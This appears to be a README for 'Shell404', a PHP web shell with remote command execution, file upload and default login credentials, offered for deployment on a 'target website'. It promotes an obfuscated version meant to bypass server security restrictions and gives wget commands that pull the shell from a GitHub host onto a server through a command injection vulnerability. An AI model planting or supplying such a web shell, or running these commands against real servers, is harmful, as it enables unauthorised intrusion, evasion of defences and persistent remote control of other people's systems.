Shell404 is a simple yet powerful PHP web shell created by Anon-404. It provides a minimalistic interface for executing system commands and managing file uploads securely, all through your web browser.
- βοΈ Command Execution: Run system commands directly from the web interface and view the output.
- π File Upload: Safely upload files to the server with a straightforward interface.
- π Login Authentication: Restrict access to authorized users with a username and password system.
- π‘οΈ Obfuscated Version: Use the obfuscated shell (
obf-Shell404.php) for bypassing server security restrictions.
$user = "Shell404";
$pass = "Shell404";- π₯ Clone the repository or download either the original
shell404.phpor the obfuscatedobf-Shell404.phpfile. - π Upload the chosen file to your server's web directory.
- π Access the web shell via your browser by navigating to the file.
- π Open the web shell in your browser.
- π Login using the default credentials:
Username : Shell404Password : Shell404
- After logging in, you can:
- βοΈ Command Input: Enter system commands and view the results in real-time.
- π File Upload: Use the file upload feature to transfer files to the server.
If the target website has a command injection vulnerability, you can easily download the Shell404 web shell using the following command:
wget https://raw.githubusercontent.com/Anon-404/Shell404/main/Shell404.phpwget https://raw.githubusercontent.com/Anon-404/Shell404/main/obf-Shell404.phpThis will fetch the obfuscated obf-Shell404.php file from the GitHub repository to the target server, allowing you to access the shell through the browser.
You can personalize the default username and password by editing the variables at the top of the shell404.php or obf-Shell404.php file:
$user = "Shell404";
$pass = "Shell404";